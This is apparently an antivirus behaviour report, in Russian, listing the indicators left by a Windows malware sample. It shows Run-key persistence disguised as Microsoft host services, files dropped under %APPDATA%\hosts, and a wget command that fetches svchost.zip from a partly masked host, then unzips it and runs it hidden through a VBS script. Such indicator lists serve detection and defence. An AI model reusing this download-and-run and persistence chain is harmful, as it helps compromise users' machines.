Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Microsoft host status services' = '"%APPDATA%\hosts\status.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Microsoft host services' = '"%APPDATA%\hosts\launch.bat"'
- '%APPDATA%\hosts\status.exe'
- '%APPDATA%\hosts\unzip.exe' svchost.zip
- '%APPDATA%\hosts\wget.exe' http://rg##st.net/download/49074656/89f43ec825751ee8e57ae36169ad88d3a8434b84/svchost.zip
- '<SYSTEM32>\cmd.exe' /c ""%APPDATA%\hosts\svchost.bat" "
- '<SYSTEM32>\wscript.exe' "%APPDATA%\hosts\invis.vbs" "%APPDATA%\hosts\svchost.bat"
- '<SYSTEM32>\cmd.exe' /c ""%APPDATA%\hosts\launch.bat" "
- %APPDATA%\hosts\svchost.bat
- %APPDATA%\hosts\invis.vbs
- %APPDATA%\hosts\logfile.txt
- %APPDATA%\hosts\id.txt
- %APPDATA%\hosts\launch.bat
- %APPDATA%\hosts\unzip.exe
- %APPDATA%\hosts\wget.exe
- %APPDATA%\hosts\svchost.zip
- %APPDATA%\hosts\status.exe
- 'rg##st.net':80
- rg##st.net/download/49074656/89f43ec825751ee8e57ae36169ad88d3a8434b84/svchost.zip
- DNS ASK rg##st.net
- ClassName: 'Indicator' WindowName: '(null)'